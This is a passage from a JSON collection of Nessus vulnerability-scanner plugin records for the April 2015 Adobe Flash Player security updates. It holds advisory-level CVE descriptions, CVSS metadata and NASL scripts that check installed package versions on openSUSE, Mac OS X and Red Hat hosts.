information disclosure (CVE-2015-3044).", "edition": 17, "published": "2015-04-16T00:00:00", "title": "openSUSE Security Update : Adobe Flash Player (openSUSE-2015-304)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2015-04-16T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player-kde4", "p-cpe:/a:novell:opensuse:flash-player-gnome", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:flash-player", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2015-304.NASL", "href": "https://www.tenable.com/plugins/nessus/82807", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-304.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82807);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n\n script_name(english:\"openSUSE Security Update : Adobe Flash Player (openSUSE-2015-304)\");\n script_summary(english:\"Check for the 
openSUSE-2015-304 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to 11.2.202.457 to fix several security\nissues that could lead to remote code execution.\n\nAn exploit for CVE-2015-3043 was reported to exist in the wild.\n\nThe following vulnerabilities were fixed :\n\n - Memory corruption vulnerabilities that could lead to\n code execution (CVE-2015-0347, CVE-2015-0350,\n CVE-2015-0352, CVE-2015-0353, CVE-2015-0354,\n CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n\n - Type confusion vulnerability that could lead to code\n execution (CVE-2015-0356).\n\n - Buffer overflow vulnerability that could lead to code\n execution (CVE-2015-0348).\n\n - Use-after-free vulnerabilities that could lead to code\n execution (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039).\n\n - Double-free vulnerabilities that could lead to code\n execution (CVE-2015-0346, CVE-2015-0359).\n\n - Memory leak vulnerabilities that could be used to bypass\n ASLR (CVE-2015-0357, CVE-2015-3040).\n\n - Security bypass vulnerability that could lead to\n information disclosure (CVE-2015-3044).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=927089\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Adobe Flash Player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag 
= 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-11.2.202.457-113.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-gnome-11.2.202.457-113.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"flash-player-kde4-11.2.202.457-113.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.457-2.48.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.457-2.48.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.457-2.48.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:29:47", "description": "The version of Adobe Flash Player installed on the remote Mac OS X\nhost is equal or prior to version 17.0.0.134. It is, therefore,\naffected by multiple vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. 
A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. (CVE-2015-3044)", "edition": 25, "published": "2015-04-14T00:00:00", "title": "Adobe Flash Player <= 17.0.0.134 Multiple Vulnerabilities (APSB15-06)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSA15-06.NASL", "href": "https://www.tenable.com/plugins/nessus/82782", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82782);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-0346\",\n \"CVE-2015-0347\",\n \"CVE-2015-0348\",\n \"CVE-2015-0349\",\n \"CVE-2015-0350\",\n \"CVE-2015-0351\",\n \"CVE-2015-0352\",\n \"CVE-2015-0353\",\n \"CVE-2015-0354\",\n \"CVE-2015-0355\",\n \"CVE-2015-0356\",\n \"CVE-2015-0357\",\n \"CVE-2015-0358\",\n \"CVE-2015-0359\",\n \"CVE-2015-0360\",\n \"CVE-2015-3038\",\n \"CVE-2015-3039\",\n \"CVE-2015-3040\",\n 
\"CVE-2015-3041\",\n \"CVE-2015-3042\",\n \"CVE-2015-3043\",\n \"CVE-2015-3044\"\n );\n script_bugtraq_id(\n 74062,\n 74064,\n 74065,\n 74066,\n 74067,\n 74068,\n 74069\n );\n\n script_name(english:\"Adobe Flash Player <= 17.0.0.134 Multiple Vulnerabilities (APSB15-06)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Mac OS X\nhost is equal or prior to version 17.0.0.134. It is, therefore,\naffected by multiple vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. 
(CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. (CVE-2015-3044)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 17.0.0.169 or later.\n\nAlternatively, Adobe has made version 13.0.0.281 and 11.2.202.457\navailable for those installations that cannot be upgraded to 17.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player domainMemory ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (ver_compare(ver:version, fix:\"14.0.0.0\", strict:FALSE) >= 0)\n{\n cutoff_version = \"17.0.0.134\";\n fix = \"17.0.0.169\";\n}\nelse\n{\n cutoff_version = \"13.0.0.277\";\n fix = \"13.0.0.281\";\n}\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:05:25", "description": "An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. 
Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB15-06 listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2015-0346, CVE-2015-0347,\nCVE-2015-0348, CVE-2015-0349, CVE-2015-0350, CVE-2015-0351,\nCVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\nCVE-2015-0356, CVE-2015-0358, CVE-2015-0359, CVE-2015-0360,\nCVE-2015-3038, CVE-2015-3039, CVE-2015-3041, CVE-2015-3042,\nCVE-2015-3043)\n\nA security bypass flaw was found in flash-plugin that could lead to\nthe disclosure of sensitive information. (CVE-2015-3044)\n\nTwo memory information leak flaws were found in flash-plugin that\ncould allow an attacker to potentially bypass ASLR (Address Space\nLayout Randomization) protection, and make it easier to exploit other\nflaws. 
(CVE-2015-0357, CVE-2015-3040)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.457.", "edition": 28, "published": "2015-04-16T00:00:00", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2015:0813)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2015-0813.NASL", "href": "https://www.tenable.com/plugins/nessus/82812", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0813. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82812);\n script_version(\"1.30\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n script_bugtraq_id(74062, 74064, 74065, 74066, 74067, 74068, 74069);\n script_xref(name:\"RHSA\", value:\"2015:0813\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2015:0813)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB15-06 listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. 
An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2015-0346, CVE-2015-0347,\nCVE-2015-0348, CVE-2015-0349, CVE-2015-0350, CVE-2015-0351,\nCVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\nCVE-2015-0356, CVE-2015-0358, CVE-2015-0359, CVE-2015-0360,\nCVE-2015-3038, CVE-2015-3039, CVE-2015-3041, CVE-2015-3042,\nCVE-2015-3043)\n\nA security bypass flaw was found in flash-plugin that could lead to\nthe disclosure of sensitive information. (CVE-2015-3044)\n\nTwo memory information leak flaws were found in flash-plugin that\ncould allow an attacker to potentially bypass ASLR (Address Space\nLayout Randomization) protection, and make it easier to exploit other\nflaws. (CVE-2015-0357, CVE-2015-3040)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.457.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0813\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3042\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3043\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3040\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3041\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3044\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0353\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0352\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0357\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0356\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0355\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0354\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0359\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0358\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0349\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0346\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0347\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3039\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3038\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 
flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0813\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.457-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.457-1.el6_6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to 
RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:14:07", "description": "According to its version, the installation of Adobe AIR on the remote\nWindows host is equal or prior to 17.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. 
